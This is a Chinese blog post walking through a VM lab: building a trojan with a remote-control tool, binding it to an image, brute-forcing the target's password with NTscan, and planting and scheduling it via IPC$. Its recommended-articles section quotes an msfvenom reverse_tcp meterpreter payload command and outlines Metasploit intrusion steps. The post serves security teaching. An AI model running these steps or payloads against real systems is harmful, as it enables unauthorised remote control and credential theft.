攻击 | 神奇的木马(虚拟机模拟木马入侵)

最新推荐文章于 2023-03-10 14:56:07 发布
最新推荐文章于 2023-03-10 14:56:07 发布
阅读量4.6k 收藏 41
点赞数 5
分类专栏: 网安 文章标签: 网络空间安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44421798/article/details/100190879
版权

攻击 | 神奇的木马(在虚拟机环境中模拟木马入侵)

→木马渊源

木马最早源于古希腊与特洛伊的战争,公元前十二世纪初,迈锡尼联合希腊各城邦组成联军,渡海远征特洛伊,战争延续十年之久,史称“特洛伊战争”特洛伊也因此闻名。

详情可见搜狗百科(https://www.sogou.com/link?url=DOb0bgH2eKjRiy6S-EyBciCDFRTZxEJgz1aVEc1sNcJVy6JvJfJZBvCJC-1zdrX6cuq-Yw0FZZWwd81skDFJS0HUolH0edGv2jSEC-yXxtVbgwbDrZgwISXlDdIxVgmF1mit9m_XrM4.
在这里插入图片描述

木马通常称为黑客程序,恶意代码,也称为特洛伊木马。同时也是基于远程控制的黑客工具。

→实验模拟

实验目的

通过经典的木马攻击还原场景,来学习木马的制作,并实现植入木马对目标主机进行完全控制。

实验设备

VMware V12.0版本
WindowsXP----------------服务端-----黑客机----192.168.5.129
Windows server2007-----客户端------目标机----192.168.5.128

实验工具

灰鸽子或者大白鲨远程控制器工具
NTscan10暴力破解工具
捆绑器工具
WindowsXP----------------服务端-----黑客机----192.168.5.129
Windows server2007-----客户端------目标机----192.168.5.128

→实验原理

一图了解实验原理
在这里插入图片描述

→具体实验

1.在虚拟机中打开XP系统和2003系统,设置两者IP,保证两者在同一网段且能够相互ping通

打开虚拟机,设置两者IP地址,保证两者在同一网段,且能够相互ping通
在这里插入图片描述
在这里插入图片描述

2.XP机进行操作
2.1打开光盘一获得:解压器工具+木马制作工具灰鸽子远程控制+暴力破解工具NTscan

光盘一:解压器+木马制作+暴力破解
在这里插入图片描述

解压器操作
在这里插入图片描述

2.2打开光盘二获得:捆绑器工具

光盘二:hack获得“捆绑器”
在这里插入图片描述

3.利用灰鸽子或大白鲨制作木马

灰鸽子制作木马
在这里插入图片描述
在这里插入图片描述

4.利用捆绑工具将图片与木马捆绑

捆绑
在这里插入图片描述

5.利用暴力破解工具破解目标机密码

使用NTscan工具破解IP地址范围,完成暴力破解
在这里插入图片描述

6.利用命令行在黑客机将木马植入到目标机

打开目标主机建立IPC$
在这里插入图片描述

植入木马目标主机
在这里插入图片描述
在这里插入图片描述

7.可设置时间定时启动目标机的木马

设置目标主机运行木马
查看时间
定时启动
在这里插入图片描述
在这里插入图片描述

8.完成木马入侵基本工程

成功控制
在这里插入图片描述

ParallelLight
关注
  • 5
    点赞
  • 41
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
rootkit模拟木马病毒
ILP-Linux的博客
02-14 6552
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 在我们生活中,经常看的电视剧谍战片里有一个必不可少的人物——卧底。它的职责就是:良好的伪装使得对手对此长时间毫无察觉;他赢得敌人的信任并因此身居要职,这使得他能够源源不断地获取重要情报并利用其独特渠道传送回去。https://...
应急响应实战之木马实战
qq_52074678的博客
05-09 2039
一.应急响应流程回顾 二.木马攻击模拟实验 (特别注意本次实验仅仅用于模拟木马攻击实验,不能拿去搞破坏,家有家规,国有国法,希望大家知法守法.) 1.环境介绍 攻击机 kali: 下载地址 被攻击机(注意关闭防火墙) win10: 下载地址: 木马脚本源码 msfvenom -a -x86 --platfrom windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口号 -b "\x00" -e x86/sh
虚拟入侵服务器,面向虚拟化平台的入侵检测系统的研究
weixin_42514910的博客
07-31 271
面向虚拟化平台的入侵检测系统的研究 (3页) 本资源提供全文预览,点击全文预览即可全文预览,如果喜欢文档就下载吧,查找使用更方便哦!9.9 积分面向虚拟化平台的入侵检测系统的研究面向虚拟化平台的入侵检测系统的研究摘要:在当今虚拟网络中,传统的入侵检测系统明显表现出 不适应性。虽然它能够向被监测中的活动主机给予很好的安全保护, 清晰地反馈对受监测中网络的运作情况,并对系统发出异常请求的数 据包进行...
虚拟主机安全配置之脚本木马防护
weixin_33728708的博客
05-13 222
2019独角兽企业重金招聘Python工程师标准>>> ...
[网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118)
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
04-08 4152
神奇木马 实现目标 通过经典的木马攻击还原场景,来学习木马的制作,并实现植入木马对目标主机进行完全控制。 木马概述 木马通常称为黑客程序,恶意代码,也称特洛伊木马 基于远程控制的黑客工具 木马特性 隐蔽性 潜伏性 再生性 木马组成 客户端程序 安装在攻击者方大的控制台,他负责远程遥控指挥 服务端程序 即木马程序,它被隐藏安装在被攻击者的电脑上,目标主机也称肉鸡 木...
虚拟机模拟西门子工控机bios
01-19
虚拟机模拟西门子工控机bios
利用linux虚拟机进行串口通信模拟
01-20
 资源不足,怎么办呢,于是想到了利用虚拟机模拟环境。  废话少说,just follow me!  第一步:安装VMware, 在虚拟机上安装linux虚拟机;  第二步:在linux虚拟机关机状态下,添加serial port,选择第三...
VMware虚拟机的三种网络模拟配置方案与实施
06-21
VMware虚拟机的三种网络模拟配置方案与实施
SQL木马清除工具.rar
03-28
*没有多台机器,建议使用虚拟机vmware 2此程序运行需要dotnet framework 2.0 支持 sql2000 sql2005 3设置数据库连接,需要使用sa用户,修复过程中使用正则表达,需要管理员权限。 4 ntext数据类型的字符串不能再...
基于开源虚拟机模拟设备的设计与实现
04-18
为了进行软硬件的并行开发,同时也提高内核态驱动的开发与测试效率,借助于开源虚拟机,实现了模拟的电子模块系统并行总线(QBUS)仿真接口。出于开源与效率考虑决定采用虚拟机QEMU。基于QEMU的模拟设备的实现有两个...
绝密:三步教你轻松窃取VMware虚拟机及其数据
weixin_34050389的博客
02-02 719
是否记得曾经虚拟化过的邮件服务器或者薪酬支付系统?如果拥有访问虚拟化工作环境管理员权限,就可以轻松地进入该虚拟化工作环境,并且窃取所有的数据,而又不会留下任何痕迹。从数据中心偷走一个物理服务器是非常困难的,并且也很容易被人发现。但是无论在任何位置都可以通过网络偷窃一台虚拟机,把该虚拟机装在闪存盘中就可以轻易地带走。 虚拟化技术可以提供很多物理服务器无法比拟的优势,但是仍...
如何让虚拟机与主机远程控制
m0_60353617的博客
07-21 3018
一,安装 安装虚拟机启动软件,根据步骤进行安装,启动完成后,打开虚拟机点击Windows安全中心,病毒和威胁防护与网络防火墙和网络保护全部关闭。 打开远程桌面 按照相同办法对真机进行上述操作。 二,地址查询 进入网络和Internet界面吗,选择以太网,点击更改适配器选项 右击选择状态,查看详细信息查看IPv4地址。 在真机中按Windows+R,输入mstsc,输入上述IPv4地址,以及用户名密码,确定。 , 选择是完成连接。 完成控制。 ...
VMware虚拟机中安装的操作系统如何访问真实主机
yw1688的专栏
01-26 3587
国庆长假有时间,准备把硬盘里收集的一些软件做成集成安装包!于是就安装了虚拟机进行测试,虚拟机关机是VMware6.0 深度完美精简版,虚拟机内安装的系统是DeepinXP-5.7,安装好后发现,虚拟机内只有C盘、D盘(虚拟机CD-ROM)和A盘(软驱),无法访问真实主机硬盘内的文件!测试软件时只能通过虚拟机的CD-ROM来测试ISO镜像安装文件,对于exe安装文件,虚拟机内看不到!  请问VMw
木马攻击实验
weixin_54992237的博客
10-25 831
实验目的 1、 理解掌握木马运行以及传播的原理。 2、 通过手动删除木马,掌握检查木马和删除木马的技巧。 3、 增强对木马安全防范意识。 预备知识 木马是隐藏在正常程序中的具有特殊功能恶意代码,是具备破坏,删除和修改文件,发送密码,记录键盘,实施Dos攻击甚至完全可能告知计算机等特殊功能的后门程序。它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。 1、木马的传统连接技术 一般木马都采用C/S(client/server,即服务器...
2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机
White_give_boy的博客
05-07 1350
使用metasploit(MSF) 和 木马 入侵win10 0x01 实验环境 攻击机:kali linux ip:192.168.171.128 目标机:windows 10 家庭普通版 ip:物理主机 0x02配置msf 1.开启数据库服务 service postgresql start 2.初始化数据库 msfdb init 3.进入msf 4. 加载模块,显示参数 5. 修改参数 LHOST为攻击机ip,LPORT为监听端口 6.开始监...
黑客常见的几种入侵方式
2201_75362610的博客
03-10 5247
顾名思义,就是获取到管理员或者用户的账号、密码,进窃取系统信息。获取口令的方法有以下两种:①通过网络监听得到用户口令:这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所用户的账号和口令.对局域网安全威胁比较大。②爆破账号、密码:在获得一个服务器上的用户口令文件Shadow文件后,用暴力破解程序破解用户口令。远程控制是在网络上,由一台计算机远距离去控制另一台计算机的技术。而远程一般是指通过网络控制远端计算机。
网络安全 kali虚拟机中的渗透实验
weixin_46067990的博客
04-11 5918
使用工具:kali虚拟机 一台靶机(准备的WindowsXP靶机) 渗透实验过程 用kali攻击Windows的XP系统 1、 先扫描找漏洞(已经准备好了一个微软平台的08年的漏洞MS08.67) 2、 渗透成功之后,建立一个反弹的连接 3、 运用权限,远程建立一个用户 4、 留后门的工作暂时先不进行 5、 成功之后返回 ...
使用大白鲨进行木马攻击实验并实现爆破目标机账号密码以远程连接
Zeker62的博客
08-06 2956
实验环境建议在虚拟机上运行 科学无罪,所有实验环境都在局域网内进行 实验条件 两个Windows虚拟机 一个安装大白鲨远程控制软件 两个虚拟机开启ftp服务(用于木马文件之间的传输) 大白鲨远程控制软件是一个比较旧的攻击软件 大白鲨远程控制 2010 Bate1(v1.6) 运行平台:Win2K、WinXP、Win03、WinVista、Win07、Win2008 软件简介: 兼容1.4~1.3版本 单一exe,不带DLL文件(无可没配置前114KB,压缩52KB)! 注入进程兼容win7/win8
vmware虚拟机模拟手机系统
最新发布
02-13
VMware是一款虚拟化软件,它可以在一台物理计算机上创建多个虚拟计算机,每个虚拟计算机都可以运行不同的操作系统。通过使用VMware,我们可以创建一个虚拟机模拟手机系统。 要模拟手机系统,首先需要下载并安装VMware软件。然后,您可以从官方网站或其他来源获取手机操作系统的镜像文件,例如Android或iOS。将镜像文件导入到VMware中,并为虚拟机分配所需的资源,如内存和存储空间。 一旦虚拟机设置完成,您可以启动虚拟机并开始模拟手机系统。您将能够在虚拟机中运行手机应用程序,浏览互联网,发送短信等等。虚拟机提供了一个安全的环境,您可以在其中测试应用程序或进行其他与手机系统相关的活动。 需要注意的是,模拟手机系统可能需要一定的计算资源和性能。确保您的计算机具备足够的硬件配置来支持虚拟化和运行手机系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ParallelLight

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值